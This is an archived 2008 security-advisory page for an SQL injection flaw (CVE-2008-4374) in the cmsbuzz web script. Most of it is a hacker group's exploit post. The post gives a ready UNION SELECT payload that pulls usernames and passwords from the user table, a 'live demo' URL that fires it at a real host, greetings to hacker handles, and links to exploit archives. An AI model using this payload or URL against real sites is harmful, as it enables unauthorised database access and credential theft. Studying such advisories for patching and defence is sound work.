|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4333 CVE : CVE-2008-4374 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : No Credit : security fears team Published : 02.10.2008
Advisory Content : ########################################################################### ###################### #################################### proud to be muslim ###################################### ### ### ### rEm0te sql injction VulnErability ### ### ### ### (cmsbuzz script) ### ### ### ########################################################################### ###################### ########################################################################### ###################### ### ### ### AuTh0r : security fears team ### ### ### ### Home : WwW.alsonaa.com ### ### ### ### members: HeB4RieH , germaya_x ### ### ### ########################################################################### ###################### ########################################################################### ###################### ### ### ### Script Name : cmsbuzz ### ### ### ### download : http://cmsbuzz.com/purchase.php ### ### ### ### Email : s-fteam@securityfears.cc ### ########################################################################### ###################### ########################################################################### ###################### ### ### ### d0rk :: "use your mind" ### ### ### ### ### ### -(:: sql Code ::)- ### ### ?action=playgame&id=(sql) ### ###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9 ,10,11,12,13+from+tbl_userprofile-- ### ### ########################################################################### ###################### ### ### ### -(:: l!ve demo ::)- ### ### ### ###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat _ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile-- ### ### ### ### ######################## ##################### ######################## ##################### ########################################################################### ###################### ########################################################################### ###################### -(:: !GreTzZ! ::)- ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: ########################################################################### ###################### ########################################################################### ###################### References : http://securityreason.com/expldownload/1/4637/1 (Exploit) http://www.securityfocus.com/bid/31097
http://www.milw0rm.com/exploits/6408
http://secunia.com/advisories/31817  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |